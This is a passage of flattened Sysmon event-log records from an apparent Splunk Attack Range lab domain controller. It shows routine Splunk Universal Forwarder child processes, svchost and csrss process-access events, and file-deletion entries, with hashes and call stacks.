Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.834{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6603B75C99CF45F80475FAA5F8E6489F,SHA256=5F19085231D1E17110E6BA8E80579C6CF3410F1698094E02B2306FD4F8107946,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.490{266CAFBE-6662-6064-6C01-00000000AE01}62485320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:06.334{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.334{266CAFBE-6662-6064-6C01-00000000AE01}6248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:06.209{266CAFBE-646C-6064-0D00-00000000AE01}6126772C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:07.865{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A0F966376FF26E18203975967E8C64C,SHA256=81FA5D26E15F5FD856CBCB3605318A8C61FB96B72BE0F8474FBB05A860207EF5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.834{266CAFBE-6663-6064-6E01-00000000AE01}36642840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.662{266CAFBE-6663-6064-6E01-00000000AE01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000010679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:07.146{266CAFBE-6662-6064-6D01-00000000AE01}30846328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:08.880{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=213F9EB336B2C37AF55AFBC4C3668488,SHA256=2040C5D1D07B5E103A4A3F75B5F20ED4E2B82168E731FD4A22B434FE040DE0DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.880{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B6561A1EFC0772495B93634764C44FB,SHA256=EDF5A9A7C6D93D69F4D1155F6A11A5CDFB741637F34EF40C95AF9DC488A3ECA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:09.458{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:09.458{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6665-6064-6F01-00000000AE01}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 